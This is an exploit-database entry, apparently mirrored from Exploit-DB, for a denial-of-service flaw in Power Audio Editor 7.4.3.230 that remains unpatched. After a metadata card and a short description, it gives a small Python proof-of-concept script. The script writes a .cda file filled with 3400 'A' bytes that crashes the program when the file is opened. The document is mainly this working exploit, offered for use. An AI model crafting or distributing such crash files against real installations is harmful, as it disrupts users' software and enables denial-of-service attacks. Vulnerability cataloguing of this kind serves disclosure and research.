header-logo
Suggest Exploit
vendor:
Power Audio Editor
by:
anT!-Tr0J4n
N/A
CVSS
MEDIUM
Denial of Service
CWE
Product Name: Power Audio Editor
Affected Version From: 7.4.3.230
Affected Version To: 7.4.3.230
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
Unknown

Power Audio Editor (.cda) Denial of service vulnerability

This exploit creates a file with the .cda extension that triggers a denial of service vulnerability in Power Audio Editor. The file contains a payload of 3400 A characters, causing the software to crash or become unresponsive when the file is opened.

Mitigation:

There is no known mitigation for this vulnerability. It is recommended to avoid opening files from untrusted sources.
Source

Exploit-DB raw data:

#Title: Power Audio Editor (.cda) Denial of service vulnerability

#Author    :   anT!-Tr0J4n

#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~all DEV-PoinT t34m

#thanks    :   r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member

#Home     :   www.Dev-PoinT.com  $ http://inj3ct0r.com

#Software :  http://www.nctsoft.net

#Version   :  7.4.3.230

#Tested on:   Windows XP sp3

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


#!/usr/bin/python
outfile="X.cda"
junk="\x41" * 3400
FILE=open(outfile, "w")
FILE.write(junk)
FILE.close()
print "[+] File created succesufully , [+]"